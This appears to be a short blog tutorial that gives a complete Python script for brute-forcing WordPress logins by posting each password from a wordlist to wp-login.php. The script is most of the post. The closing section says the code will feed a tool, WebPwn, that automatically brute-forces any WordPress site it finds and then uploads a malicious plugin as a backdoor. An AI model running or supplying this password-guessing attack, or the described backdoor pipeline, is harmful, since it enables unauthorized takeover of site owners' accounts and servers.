This post is all about the Python, not the end result: for brute forcing there are plenty of good existing options such as WPScan or Hydra, but we want to write our own that will go into the WebPwn tool.

The Code

# Import the libraries we need
import requests
import sys

# Assign values based on script arguments: target host, username, password list
if len(sys.argv) != 4:
    print("Usage: " + sys.argv[0] + " <host> <user> <passfile>")
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
passfile = sys.argv[3]

# Open the password file
with open(passfile, "r") as ifile:
    # Loop over each password, i.e. each line in the file
    for line in ifile:
        password = line.rstrip("\n")
        # Print the current password we are trying
        print("Trying: " + password)
        # Make the login request to the WordPress login endpoint
        resp = requests.post(host + '/wp-login.php', data={'log': user, 'pwd': password})
        # If the response carries no "Invalid" error we logged in, so print the login values
        if "Invalid" not in resp.text:
            print("Login with user: " + user + " & pass: " + password)
            break

What Next

This is of course a really simple example; you can now extend it in many ways, or point it at other services by replacing the response check and the endpoint.

This code will be added to WebPWN so that it can automatically brute-force any WP install it finds; the WebPWN code will then upload a malicious plugin as a backdoor.

Try and test this on other services and see what caveats you find: testing and playing with simple code like this is a great way to learn programming and Python, as there is no complexity getting in the way. Of course, this code is not optimal, nor would you deploy it into production: the host argument is used unchecked, so you can easily make requests to anything you want, and inject a terminating character so the WP endpoint is ignored.